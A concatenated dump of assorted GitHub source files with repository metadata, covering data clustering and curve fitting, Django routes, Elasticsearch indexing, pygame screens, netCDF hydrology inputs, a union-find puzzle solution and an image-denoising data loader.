arrws=np.array(optclus_ws)\n    arrws=arrws[arrws>1] # Finding the value after 
which elbow curve smooths\n    clopt=arrws[-1] # Finding optimum value of cluster\n    optclus=optclus_ws.index(clopt)\n    return optclus, optclus_ws, val\n\nclus, allws, clsvl=optclus(scldfs[0]) # \nmpy.figure(figsize=(5,3)) # plot figure size\nmpy.title('Elbow Curve (Optimum Cluster: {})'.format(clus)) # plot title\nmpy.plot(range(1, clsvl), allws,\"c--\") # plot inertia value\nmpy.plot(range(1, clsvl), allws,\"Xm\")\nmpy.xlabel('Number of clusters') # x-label of plotting\nmpy.ylabel('Inertia') # y-label of plotting\nmpy.grid() # plot griding\nmpy.show() # plot show\n\nkmeans = KMeans(n_clusters=clus, init='k-means++', max_iter=300, n_init=10, random_state=0) # final kmeans with optimum cluster\nkmd = kmeans.fit(scldfs[0]) # train kmeans\nprint(\"Cluster Centres:\",kmd.cluster_centers_)\n\nkmd.cluster_centers_\n\nallcntr=[]\nfor i in kmd.labels_:\n    if i==0:\n        allcntr.append(clmns[0])\n    elif i==1:\n        allcntr.append(clmns[1])\n    elif i==2:\n        allcntr.append(clmns[2])\n    elif i==3:\n        allcntr.append(clmns[3])\n    elif i==4:\n        allcntr.append(clmns[4])\n    else:\n        pass\n\ndf=pd.DataFrame(scldfs[0],columns=my_dataframe1.columns)\nmpy.figure(figsize=(6,3)) # plot figure size\nmpy.title('Cluster Visualization') # plot title\nsns.scatterplot(data=df, x=clmns[0], y=clmns[1], hue=allcntr,palette=\"PuRd\") # scatter plot for cluster visualization\nmpy.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], marker=\"d\", c=\"b\", s=80, label=\"centroids\")\nmpy.legend() # place legend\nmpy.grid() # plot griding\nmpy.show() # plot show\n\n\"\"\"## Curve Fitting\"\"\"\n\nfrom scipy.optimize import curve_fit\n#!pip install lmfit\nfrom lmfit import Model\n\ndef func(x, amp, cen, wid): # method for curve fitting\n    return (amp / (np.sqrt(2*np.pi) * wid)) * np.exp(-(x-cen)**3 / (2*wid**2))\n\nnorml2 = nrmdata(my_dataframe2.values) # normalize data\ny = func(scldfs[1].iloc[:,1], 2.1, 0.7, 1.51) + np.random.normal(0, 0.2, norml2[0].shape[0]) # calling method\ninit_vals = [2, 0, 2] \nbest_vals, covar = curve_fit(func, norml2[0][:,1], y, p0=init_vals,maxfev = 700) # curve fitting\ngmodel = Model(func) # preparing curve fitting\n\nresult = gmodel.fit(y, x=norml2[0][:,1], amp=5, cen=3, wid=0.4) # train model\nplt.figure(figsize=(6,4)) # plot figure size\nplt.title('Curve Fitting Result') # plot title\nplt.plot(norml2[0][:,1],\"bo\",label=\"Data\")\nplt.plot(result.init_fit, 'm--', label='Initial fit')\nplt.plot(result.best_fit, 'c-', label='Best fit')\nplt.legend() # place legend\nplt.grid() # plot griding\nplt.show() # plot show\n\nresult\n\n","repo_name":"Manasakallem/ADS3","sub_path":"22033469.py","file_name":"22033469.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"20656227946","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('auth/', views.auth),\n path('login/', views.login),\n path('projects/', views.IndexView.as_view(), name=\"projects\"),\n path('projects//', views.ProjectView.as_view(), name=\"project\"),\n path('projects//project-tasks//', views.ProjectTaskView.as_view()),\n path('projects//project-tasks//tasks//', views.TaskView.as_view())\n]","repo_name":"turytsia/webapp-todo","sub_path":"server/todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15986151316","text":"import csv\nfrom urllib.parse import urlparse\nimport os, sys\nnb_dir = os.path.split(os.getcwd())[0]\nif nb_dir not in sys.path:\n sys.path.append(nb_dir)\nfrom trec_utils import utils\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch import helpers\n\n# Remember that a config.json has to be present in trec_utils\nconfig = utils.load_config()\nurl_info = urlparse(config['ELASTIC'])\n\nes = Elasticsearch([{'host':url_info.hostname,'port':url_info.port}])\n\ndef index_file(file):\n with open(file) as tsvfile:\n reader = csv.reader(tsvfile, delimiter='\\t')\n fake_doc = {\n 'pubmedId': '0',\n 'treatments': {'faketreatment':1},\n 'cuis': {'FAKECUI':1}\n }\n\n doc = fake_doc\n\n actions = []\n \n for row in reader: \n try: \n pubmedId, cui, treatment = row[0], row[1], row[2]\n\n if pubmedId==doc['pubmedId']:\n if treatment in doc['treatments']:\n doc['treatments'][treatment] = doc['treatments'][treatment] + 1\n else:\n doc['treatments'][treatment] = 1\n if cui in doc['cuis']:\n doc['cuis'][cui] = doc['cuis'][cui] + 1\n else:\n doc['cuis'][cui] = 1\n else:\n # Transform dictionaries to list to avoid Elasticsearch issues\n doc_to_save = {\n 'pubmedId': doc['pubmedId'],\n 'treatments': [ [k,str(v)] for k, v in doc['treatments'].items() ],\n 'cuis': [ [k,str(v)] for k, v in doc['cuis'].items() ]\n }\n actions.append({\n \"_id\": doc_to_save['pubmedId'],\n \"_op_type\": \"index\",\n \"_index\": \"treatments\",\n \"_type\": \"treatments\",\n \"_source\": doc_to_save\n })\n doc = {'pubmedId':pubmedId,'treatments':{treatment:1}, 'cuis':{cui:1}}\n except:\n print(\"Exception, line blank?\")\n continue\n \n helpers.bulk(es, actions)\n print(file + \" indexed!\")\n \n# Download and extract this file here\n# http://www.trec-cds.org/medline_treatments.tar.gz\ndef index_all_files():\n i = 0\n for file in os.listdir(nb_dir + \"/treatments_indexing/medline_treatments\"):\n if file.endswith(\".txt\"):\n file = nb_dir + \"/treatments_indexing/medline_treatments/\" + file\n index_file(file)\n i = i + 1\n print(\"Finished! 
- Files:\", i)\n \nif __name__ == \"__main__\":\n index_all_files()","repo_name":"plopezgarcia/trec-2019-precision-medicine","sub_path":"python-experiments/treatments_indexing/index_treatments.py","file_name":"index_treatments.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"75026857972","text":"import pygame as pg\n\n\ndef writeScore(text, score):\n f = open(\"Score.txt\", 'r+')\n x = text + \":\" + str(score) + \"\\n\"\n lines = f.readlines()\n for i in range(0,len(lines) - 1):\n split = lines[i].split(\":\")\n number = int(split[1])\n print(number)\n if score > number:\n lines.insert(i,x)\n break\n g = open(\"Score.txt\", 'r+')\n for i in range(0, len(lines)):\n g.write(lines[i])\n g.close()\n f.close()\n\n\ndef main(screen, resolution, FPS, clock, score):\n font = pg.font.Font(None, 32)\n\n nome = font.render(\"Digite seu nome:\", True, (255,255,255))\n nomeRect = pg.Rect(0,0,nome.get_width(),nome.get_height())\n nomeRect.center = (resolution[0] / 2, resolution[1] * 0.3)\n input_box = pg.Rect(0, 0, 150, 32)\n input_box.center = (resolution[0] / 2, resolution[1] * 0.4)\n done_button = font.render(\"OK\", True, (255, 255, 255), (0, 200, 0))\n done_buttonRect = pg.Rect(0, 0, done_button.get_width(), done_button.get_height())\n done_buttonRect.center = (input_box.centerx, input_box.centery * 1.2)\n\n color_inactive = pg.Color('lightskyblue3')\n color_active = pg.Color('dodgerblue2')\n color = color_inactive\n active = False\n text = ''\n done = True\n\n while done:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n done = False\n if event.type == pg.MOUSEBUTTONDOWN:\n # If the user clicked on the input_box rect.\n if input_box.collidepoint(event.pos):\n # Toggle the active variable.\n active = not active\n if done_buttonRect.collidepoint(event.pos):\n writeScore(text, score)\n done = False\n else:\n active = True\n # Change the current color of the input box.\n color = color_active if active else color_inactive\n\n if event.type == pg.KEYDOWN:\n if active:\n if event.key == pg.K_RETURN:\n print(text)\n text = ''\n elif event.key == pg.K_BACKSPACE:\n text = text[:-1]\n elif len(text) < 10:\n text += event.unicode\n screen.fill((30, 30, 30))\n # Render the current text.\n txt_surface = font.render(text, True, color)\n # Resize the box if the text is too long.\n width = max(150, txt_surface.get_width()+10)\n input_box.w = width\n # Blit the text.\n screen.blit(txt_surface, (input_box.x+5, input_box.y+5))\n # Blit the input_box rect.\n pg.draw.rect(screen, color, input_box, 2)\n screen.blit(done_button, done_buttonRect)\n screen.blit(nome, nomeRect)\n pg.display.flip()\n clock.tick(FPS)\n","repo_name":"gahenrique/asteroids","sub_path":"scoreScene.py","file_name":"scoreScene.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73539985973","text":"######################################\n# Import and initialize the librarys #\n######################################\nfrom code.api.core import os, log, pygame, PgEss\nfrom code.api.objects import Screen, Frame\nfrom code.api.actions import Runclass, Switchscreen, Info, Alert\nfrom code.api.data.Sound import sound\n\n\n#################\n# Setup logging #\n#################\nfilename = os.path.basename(__file__).split('.')[0]\nlogger = log.get_logger(filename)\n\n\n############################\n# Screen main action class 
#\n############################\nclass mainmenu:\n\n @staticmethod\n def init():\n # Play game background music\n if not sound.background.isPlaying():\n sound.stopAll(600)\n sound.background.play(loops=-1, withVolume=PgEss.config.sound.background, fadetime=3000)\n \n @staticmethod\n def run():\n # Get action\n event_result = mainmenu_screen.events.get()\n \n # No action\n if event_result == None: return\n # Quit program\n if event_result.contains('outcome', 'quit'): return 'quit'\n\n\n##################\n# Screen objects #\n##################\nmainmenu_screen = Screen (\n name = 'mainmenu',\n main = mainmenu,\n surfaces = {\n 'menu': {\n 'frame': Frame(x=0, y=0, w=1800, h=1080),\n 'new_game': {\n 'type': 'button',\n 'frame': Frame(x=878, y=266, w=652, h=134),\n 'imageData': {'frame': Frame(x=878, y=266, w=652, h=134)},\n 'action': Switchscreen(type='load', screen='new_game')\n },\n 'load_saved': {\n 'type': 'button',\n 'frame': Frame(x=878, y=469, w=652, h=134),\n 'imageData': {'frame': Frame(x=878, y=469, w=652, h=134)},\n 'action': Switchscreen(type='load', screen='saves')\n },\n 'leaderboard': { \n 'type': 'button',\n 'frame': Frame(x=878, y=672, w=652, h=134),\n 'imageData': {'frame': Frame(x=878, y=672, w=652, h=134)},\n 'action': Switchscreen(type='load', screen='leaderboard')\n },\n 'credits': { \n 'type': 'button',\n 'frame': Frame(x=878, y=875, w=652, h=134),\n 'imageData': {'frame': Frame(x=878, y=875, w=652, h=134)},\n 'action': Switchscreen(type='load', screen='credit')\n },\n 'quit': {\n 'type': 'button',\n 'frame': Frame(x=1705, y=986, w=84, h=84),\n 'imageData': {'frame': Frame(x=1690, y=975, w=110, h=105)},\n 'action': Alert (\n type='confirm', \n title='Quit Game',\n content='Are you sure you want to quit?',\n yes=Info(text='quit')\n ),\n },\n }\n }\n)","repo_name":"benwoo1110/Ratventure","sub_path":"python/code/screens/mainmenu.py","file_name":"mainmenu.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"70154023094","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 29 11:13:26 2022\n\n@author: galengorski\n\"\"\"\n\n#import netCDF4\nfrom datetime import datetime\nimport netCDF4\nfrom netCDF4 import Dataset,num2date,date2num\nimport numpy as np\nimport pandas as pd\n#%%\nhydro_data = pd.read_csv('01_fetch/out/hydro_filled_220128.csv', \n usecols = ['site_no','Date','discharge','nitrate','discharge_interp'],\n dtype = {'site_no':str,\n 'discharge': float,\n 'nitrate': float,\n 'discharge_interp':str\n },\n parse_dates = ['Date'],\n index_col = 'Date')\n\n#remove two sites with suspect looking data\nsite_info = pd.read_csv('01_fetch/out/site_list_220507.csv', dtype = {'site_no':str})\nsites = site_info.site_no.unique()\n\nmodel_input_nc = netCDF4.Dataset('02_munge/out/model_input_230526.nc',mode='w')\nmodel_input_nc.title='Modeling input data'\n\nfor i, single_site in enumerate(sites):\n\n hydro_data_temp = hydro_data[hydro_data.site_no == single_site].copy()\n #calculate 7 day moving average\n hydro_data_temp['nitrate_rolling'] = hydro_data_temp['nitrate'].rolling(\"7D\", min_periods = 3, center=False).mean()\n hydro_data_temp['nitrate'] = hydro_data_temp['nitrate_rolling']\n hydro_data_temp['discharge_l10'] = np.log10(hydro_data_temp['discharge']+0.01)\n met_data = pd.read_csv('01_fetch/out/met_data/'+single_site+'_met_data.csv',\n parse_dates = ['date'], index_col = 'date')\n #make sure they have the same length\n len(hydro_data_temp) 
== len(met_data)\n #join met data with hydro data\n hydro_met = hydro_data_temp.join(met_data, how = 'outer')\n hydro_met['nitrate'] = hydro_met['nitrate'].fillna(-999)\n #hydro_met['nitrate_rolling'] = hydro_met['nitrate_rolling'].fillna(-999)\n #\n \n #read in basin char data\n basin_char = pd.read_csv('01_fetch/out/basin_char/'+single_site+'_basin_char.csv')\n \n #read in groundwater data\n gw_char = pd.read_csv('01_fetch/out/gw_char.csv', dtype= {'site_no':str})\n gw_char_site = gw_char[gw_char['site_no'] == single_site].iloc[:,1:4]\n basin_char_gw = basin_char.append(gw_char_site)\n \n #read in tile drain data\n tiles_char = pd.read_csv('01_fetch/out/tile_drain_char.csv', dtype= {'site_no':str})\n tiles_char_sites = tiles_char[tiles_char['site_no'] == single_site].iloc[:,1:4]\n basin_char_tiles = basin_char_gw.append(tiles_char_sites)\n \n #add in lat and long\n lat_long_df = pd.DataFrame()\n lat_long_df['characteristic_id'] = ['lat','long']\n lat_long_df['characteristic_value'] = list(site_info[site_info.site_no == single_site][['dec_lat_va','dec_long_va']].iloc[0])\n lat_long_df['percent_no_data'] = np.nan\n #merge with basin char\n basin_char_ll = basin_char_tiles.append(lat_long_df)\n \n #read in land cover\n land_cover = pd.read_csv('01_fetch/out/nlcd_data/land_cover_'+single_site+'.csv', \n header = 0, sep = ' ',\n dtype = {'cat':str,\n 'value':float})\n\n \n #clean up column names\n land_cover['characteristic_id'] = 'NLCD_'+land_cover['cat']\n land_cover['characteristic_value'] = land_cover['value']\n land_cover['percent_nodata'] = np.nan\n land_cover = land_cover[['characteristic_id','characteristic_value','percent_nodata']]\n #merge with basin char\n basin_char_lc = basin_char_ll.append(land_cover)\n #\n #fill netcdf\n site = model_input_nc.createGroup(single_site)\n site.site_name = site_info.station_nm[i]\n site.lat_long = [str(site_info.dec_lat_va[i]), str(site_info.dec_long_va[i])]\n site.date_range = [datetime.strftime(hydro_met.index.min(), '%Y-%m-%d'), datetime.strftime(hydro_met.index.max(), '%Y-%m-%d')]\n today = datetime.today()\n site.history = \"Created \" + today.strftime(\"%Y-%m-%d\")\n \n # dimensions.\n time = site.createDimension('time', None)\n basin_char = site.createDimension('basin_char',None)\n \n #create static variables\n \n for j in range(len(basin_char_lc)):\n var_name = basin_char_lc.iloc[j,0]\n #create the variable\n temp_var = site.createVariable(var_name,'f8', 'basin_char')\n #fill the variable\n temp_var[:] = basin_char_lc.iloc[j,1]\n \n #dynamic variables\n date = site.createVariable('Date','f8','time')\n discharge = site.createVariable('Discharge','f8','time')\n discharge_l10 = site.createVariable('Discharge_l10','f8','time')\n nitrate = site.createVariable('Nitrate','f8','time')\n precip = site.createVariable('Precip','f8','time')\n tmax = site.createVariable('TempMax','f8','time')\n tmin = site.createVariable('TempMin','f8','time')\n srad = site.createVariable('SolarRad','f8','time')\n \n \n #fill in dynamic data\n date.units = 'hours since 0001-01-01 00:00:00.0'\n date.calendar = 'gregorian'\n date[:] = date2num(hydro_met.index.to_list(), units=date.units,calendar=date.calendar)\n date.units = 'hours since 0001-01-01 00:00:00.0'\n date.calendar = 'gregorian'\n date.range = [datetime.strftime(hydro_met.index.min(), '%Y-%m-%d'), datetime.strftime(hydro_met.index.max(), '%Y-%m-%d')]\n discharge[:] = hydro_met.discharge\n discharge.units = 'cfs'\n discharge_l10[:] = hydro_met.discharge_l10\n discharge_l10.units = 'none'\n nitrate[:] = 
hydro_met.nitrate\n nitrate.units = 'mg/L [NO3-NO2]'\n #nitrate_rolling[:] = hydro_met.nitrate_rolling\n #nitrate_rolling.units = 'mg/L [NO3-NO2]'\n precip[:] = hydro_met.prcp\n precip.units = 'mm'\n tmax[:] = hydro_met.tmax\n tmax.units = 'K'\n tmin[:] = hydro_met.tmin\n tmin.units = 'K'\n srad[:] = hydro_met.srad\n srad.units = 'W/m^2'\n \n print(site_info.site_no[i]+' | '+single_site+' | '+site_info.station_nm[i])\n \nmodel_input_nc.close()\n \n","repo_name":"galengorski/no3_ml_proj","sub_path":"02_munge/src/merge_hydro_met_basin_char.py","file_name":"merge_hydro_met_basin_char.py","file_ext":"py","file_size_in_byte":5997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10080215788","text":"# encoding=utf8\n\n'''\n959. Regions Cut By Slashes\nIn a N x N grid composed of 1 x 1 squares, each 1 x 1 square consists of a /, \\, or blank space. These characters divide the square into contiguous regions.\n\n(Note that backslash characters are escaped, so a \\ is represented as \"\\\\\".)\n\nReturn the number of regions.\n\n\n\nExample 1:\n\nInput:\n[\n \" /\",\n \"/ \"\n]\nOutput: 2\nExplanation: The 2x2 grid is as follows:\n\nExample 2:\n\nInput:\n[\n \" /\",\n \" \"\n]\nOutput: 1\nExplanation: The 2x2 grid is as follows:\n\nExample 3:\n\nInput:\n[\n \"\\\\/\",\n \"/\\\\\"\n]\nOutput: 4\nExplanation: (Recall that because \\ characters are escaped, \"\\\\/\" refers to \\/, and \"/\\\\\" refers to /\\.)\nThe 2x2 grid is as follows:\n\nExample 4:\n\nInput:\n[\n \"/\\\\\",\n \"\\\\/\"\n]\nOutput: 5\nExplanation: (Recall that because \\ characters are escaped, \"/\\\\\" refers to /\\, and \"\\\\/\" refers to \\/.)\nThe 2x2 grid is as follows:\n\nExample 5:\n\nInput:\n[\n \"//\",\n \"/ \"\n]\nOutput: 3\nExplanation: The 2x2 grid is as follows:\n\n\n\nNote:\n\n1 <= grid.length == grid[0].length <= 30\ngrid[i][j] is either '/', '\\', or ' '.\n\n\n959. 
由斜杠划分区域\n在由 1 x 1 方格组成的 N x N 网格 grid 中,每个 1 x 1 方块由 /、\\ 或空格构成。这些字符会将方块划分为一些共边的区域。\n\n(请注意,反斜杠字符是转义的,因此 \\ 用 \"\\\\\" 表示。)。\n\n返回区域的数目。\n\n\n\n示例 1:\n\n输入:\n[\n \" /\",\n \"/ \"\n]\n输出:2\n解释:2x2 网格如下:\n\n示例 2:\n\n输入:\n[\n \" /\",\n \" \"\n]\n输出:1\n解释:2x2 网格如下:\n\n示例 3:\n\n输入:\n[\n \"\\\\/\",\n \"/\\\\\"\n]\n输出:4\n解释:(回想一下,因为 \\ 字符是转义的,所以 \"\\\\/\" 表示 \\/,而 \"/\\\\\" 表示 /\\。)\n2x2 网格如下:\n\n示例 4:\n\n输入:\n[\n \"/\\\\\",\n \"\\\\/\"\n]\n输出:5\n解释:(回想一下,因为 \\ 字符是转义的,所以 \"/\\\\\" 表示 /\\,而 \"\\\\/\" 表示 \\/。)\n2x2 网格如下:\n\n示例 5:\n\n输入:\n[\n \"//\",\n \"/ \"\n]\n输出:3\n解释:2x2 网格如下:\n\n\n\n提示:\n\n1 <= grid.length == grid[0].length <= 30\ngrid[i][j] 是 '/'、'\\'、或 ' '。\n'''\n\n\n\nclass Solution(object):\n def regionsBySlashes(self, grid):\n \"\"\"\n :type grid: List[str]\n :rtype: int\n \"\"\"\n length = len(grid)\n p = {(i, j): (i, j) for j in range(length) for i in range(length)}\n\n for i in range(length+1):\n p[(i, 0)], p[(0, i)], p[(length, i)], p[(i, length)] = (0, 0), (0, 0), (0, 0), (0, 0)\n\n def find(x):\n px = p[x]\n if px != x:\n px = find(p[x])\n return px\n\n def union(x, y):\n px = find(x)\n py = find(y)\n if px != py:\n p[px] = py\n return False\n return True\n\n res = 1\n for i in range(length):\n for j in range(length):\n if grid[i][j] == \"/\":\n if union((i+1, j), (i, j+1)):\n res += 1\n elif grid[i][j] == \"\\\\\":\n if union((i+1, j+1), (i, j)):\n res += 1\n\n return res\n\n\n# solutions\n\n'''\n方法一:并查集\n我们沿着一个网格的两条对角线,能够将正方形切分成四个三角形。如果网格上的字符为 /,则右下角的两个三角形会与左上角的两个三角形分隔开;同理,如果字符为 \\,则右上角的两个三角形会和左下角的两个三角形分隔开。\n\n不难发现,如果将每个三角形看作为一张图上的节点,则网格中的一个共边区域,就相当于图中的一个连通分量。因此,不难想到利用并查集求解连通分量的数目。\n\n设网格为 n \\times nn×n 大小,则图中有 4n^24n \n2\n 个节点,每个格子对应其中的 44 个节点。对于每个格子而言,考虑当前位置的字符:\n\n如果为空格,则该格子对应的 44 个节点应当同属于同一区域,因此在它们之间各连接一条边;\n\n如果为字符 /,则将左上角的两个格子连接一条边,并将右下角的两个格子连接一条边;\n\n如果为字符 \\,则将右上角的两个格子连接一条边,并将左下角的两个格子连接一条边。\n\n到目前位置,我们只考虑了一个格子内部的情况。但同时,不难观察到下面两点:\n\n一个格子中最下方的三角形,必然和下面的格子(如果存在)中最上方的三角形连通;\n\n一个格子中最右方的三角形,必然和右边的格子(如果存在)中最左方的三角形连通。\n\n因此,我们还需要根据上面两条规则,在相邻格子的相应三角形中间,再连接边。\n\n最终,在构造出图后,利用并查集就可以求出连通分量的数目了。\n\n具体实现方面,每个格子的 44 个节点按照上、右、下、左的顺序依次编号 00、11、22、33,每个节点可以根据格子所在的行和列以及节点在格子中的编号唯一地确定。\n\nC++JavaJavaScriptGolangC\n\ntype unionFind struct {\n parent, size []int\n setCount int // 当前连通分量数目\n}\n\nfunc newUnionFind(n int) *unionFind {\n parent := make([]int, n)\n size := make([]int, n)\n for i := range parent {\n parent[i] = i\n size[i] = 1\n }\n return &unionFind{parent, size, n}\n}\n\nfunc (uf *unionFind) find(x int) int {\n if uf.parent[x] != x {\n uf.parent[x] = uf.find(uf.parent[x])\n }\n return uf.parent[x]\n}\n\nfunc (uf *unionFind) union(x, y int) {\n fx, fy := uf.find(x), uf.find(y)\n if fx == fy {\n return\n }\n if uf.size[fx] < uf.size[fy] {\n fx, fy = fy, fx\n }\n uf.size[fx] += uf.size[fy]\n uf.parent[fy] = fx\n uf.setCount--\n}\n\nfunc regionsBySlashes(grid []string) int {\n n := len(grid)\n uf := newUnionFind(4 * n * n)\n for i := 0; i < n; i++ {\n for j := 0; j < n; j++ {\n idx := i*n + j\n if i < n-1 {\n bottom := idx + n\n uf.union(idx*4+2, bottom*4)\n }\n if j < n-1 {\n right := idx + 1\n uf.union(idx*4+1, right*4+3)\n }\n if grid[i][j] == '/' {\n uf.union(idx*4, idx*4+3)\n uf.union(idx*4+1, idx*4+2)\n } else if grid[i][j] == '\\\\' {\n uf.union(idx*4, idx*4+1)\n uf.union(idx*4+2, idx*4+3)\n } else {\n uf.union(idx*4, idx*4+1)\n uf.union(idx*4+1, idx*4+2)\n uf.union(idx*4+2, idx*4+3)\n }\n }\n }\n return uf.setCount\n}\n复杂度分析\n\n时间复杂度:O(n^2\\log n)O(n \n2\n logn),其中 nn 是网格的边长。仅使用路径压缩的并查集的复杂度为 O(n^2\\log n^2)=O(n^2\\times 2\\log n)=O(n^2\\log n)O(n \n2\n logn \n2\n )=O(n \n2\n 
\nComplexity analysis\n\nTime complexity: O(n^2 log n), where n is the side length of the grid. A union-find using only path compression has complexity O(n^2 log n^2) = O(n^2 * 2 log n) = O(n^2 log n).\n\nSpace complexity: O(n^2).\n\nAuthor: LeetCode-Solution\nLink: https://leetcode-cn.com/problems/regions-cut-by-slashes/solution/you-xie-gang-hua-fen-qu-yu-by-leetcode-s-ztob/\nSource: 力扣 (LeetCode)\nThe copyright belongs to the author. For commercial reprints, please contact the author for authorization; for non-commercial reprints, please cite the source.\n'''\n\n","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/union_find_set/leetcode-959-RegionsCutBySlashes.py","file_name":"leetcode-959-RegionsCutBySlashes.py","file_ext":"py","file_size_in_byte":7115,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"18799901984","text":"import torchvision.transforms.functional as tvF\nfrom torch.utils.data import Dataset, DataLoader\n\nimport os\nimport torch\nimport numpy as np\nfrom PIL import Image\n\n\ndef load_dataset(root_dir, redux, params, shuffled=False, single=False, normalized=True):\n    noise = (params.noise_type, params.noise_param)\n\n    dataset = NoisyDataset(root_dir, redux, params.crop_size,\n                           clean_targets=params.clean_targets, noise_dist=noise, seed=params.seed)\n\n    if single: # use if testing to only load one image\n        return DataLoader(dataset, batch_size=1, shuffle=shuffled)\n    else:\n        return DataLoader(dataset, batch_size=params.batch_size, shuffle=shuffled)\n\n\nclass AbstractDataset(Dataset):\n    def __init__(self, root_dir, redux=0, crop_size=128, clean_targets=False):\n        super(AbstractDataset, self).__init__()\n\n        self.imgs = []\n        self.root_dir = root_dir\n        self.redux = redux\n        self.crop_size = crop_size\n        self.clean_targets = clean_targets\n\n    def __getitem__(self, index):\n        \"\"\"Retrieves image from data folder.\"\"\"\n\n        raise NotImplementedError('Abstract method not implemented!')\n\n    def __len__(self):\n        \"\"\"Returns length of dataset.\"\"\"\n\n        return len(self.imgs)\n\n\nclass NoisyDataset(AbstractDataset):\n\n    def __init__(self, root_dir, redux, crop_size, clean_targets=False, noise_dist=('gaussian', 50.), seed=None):\n        super(NoisyDataset, self).__init__(root_dir, redux, crop_size, clean_targets)\n\n        self.imgs = os.listdir(root_dir)\n        if redux:\n            self.imgs = self.imgs[:redux]\n\n        # Noise parameters (max std for Gaussian, lambda for Poisson)\n        self.noise_type = noise_dist[0]\n        self.noise_param = noise_dist[1]\n        self.seed = seed\n        if self.seed:\n            np.random.seed(self.seed)\n\n    def _add_noise(self, img):\n        \"\"\"Adds Gaussian, Poisson, or impulse noise to an image.\"\"\"\n\n        w, h = img.size\n        c = len(img.getbands())\n\n        # Poisson distribution\n        # It is unclear how the paper handles this. Poisson noise is not additive,\n        # it is data dependent, meaning that adding sampled values from a Poisson\n        # will change the image intensity...
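        # Worked numeric example of that signal dependence (illustrative numbers\n        # only, not from the paper): a bright pixel with a mean of 10,000 photons\n        # has shot-noise std sqrt(10000) = 100 (SNR 100), while a dark pixel with\n        # a mean of 100 photons has std sqrt(100) = 10 (SNR only 10) -- the noise\n        # grows with the intensity instead of being a fixed additive term.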
\n        if self.noise_type == 'poisson':\n            # high quality images typically have 10,000 photons per pixel\n            # (https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4354036/)\n            dispersion = 75 # chosen based on a distribution centered at ~450 with range ~100-1000\n            photons_per_pixel = np.random.negative_binomial(self.noise_param / dispersion, 1 / self.noise_param) / self.noise_param * dispersion\n            noise_img = np.random.poisson(np.array(img) / 255.0 * photons_per_pixel) / photons_per_pixel * 255\n\n        elif self.noise_type == 'impulse':\n            p = 0.2\n            if self.seed:\n                std = self.noise_param\n            else:\n                std = np.random.uniform(0, self.noise_param)\n            noise = np.random.normal(0, std, (h, w, c))\n            mask = np.random.uniform(0, 1, (h, w, c)) > p\n            noise[mask] = 0\n            noise_img = np.array(img) + noise\n\n        # Normal distribution (default)\n        else:\n            if self.seed:\n                std = self.noise_param\n            else:\n                std = np.random.uniform(0, self.noise_param)\n            noise = np.random.normal(0, std, (h, w, c))\n            noise_img = np.array(img) + noise\n\n        noise_img = np.clip(noise_img, 0, 255).astype(np.uint8)\n        return Image.fromarray(noise_img)\n\n    def _corrupt(self, img):\n        \"\"\"Corrupts images (Gaussian, Poisson, or impulse).\"\"\"\n\n        if self.noise_type in ['gaussian', 'poisson', 'impulse']:\n            return self._add_noise(img)\n        else:\n            raise ValueError('Invalid noise type: {}'.format(self.noise_type))\n\n    def __getitem__(self, index):\n        \"\"\"Retrieves image from folder and corrupts it.\"\"\"\n\n        # Load PIL image\n        img_path = os.path.join(self.root_dir, self.imgs[index])\n        img = Image.open(img_path).convert('RGB')\n\n        # Corrupt source image\n        source = tvF.to_tensor(self._corrupt(img))\n\n        # Corrupt target image, but not when clean targets are requested\n        if self.clean_targets:\n            target = tvF.to_tensor(img)\n        else:\n            target = tvF.to_tensor(self._corrupt(img))\n\n        return source, target\n\n\nclass ToRGBTensor(object):\n    \"\"\"\n    The default ToTensor transform scales input to [0, 1]; this one does not.\n    \"\"\"\n    def __call__(self, x):\n        # Convert from PIL image to numpy\n        result = np.asarray(x)\n        # Move axis to enforce same style as previous input\n        result = np.moveaxis(result, -1, 0)\n        # Convert from numpy to torch tensor\n        result = torch.from_numpy(result)\n        return result","repo_name":"hauserkristen/adversarial_denoising","sub_path":"denoising/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"40250661297","text":"from heapq import heappop, heappush\n\n\nn = int(input())\nlamps = []\nfor _ in range(n):\n    lamps.append(list(map(int, input().split())))\nbenchs = list(map(int, input().split()))\n\npq = []\n\"\"\"\n1, Lamp on\n2, Bench\n3, Lamp off\n\"\"\"\nfor x, y in lamps:\n    heappush(pq, (x, 1))\n    heappush(pq, (y, 3))\n\nfor bench in benchs:\n    heappush(pq, (bench, 2))\n\nlights = 0\nresult = []\nwhile pq:\n    v, t = heappop(pq)\n    if t == 1:\n        lights += 1\n    elif t == 2:\n        result.append(lights)\n    elif t == 3:\n        lights -= 1\nprint(*result)","repo_name":"Naboni/Competitive-Programming","sub_path":"OA/lamps_and_bench.py","file_name":"lamps_and_bench.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"75001539573","text":"from fastapi.openapi.docs import 
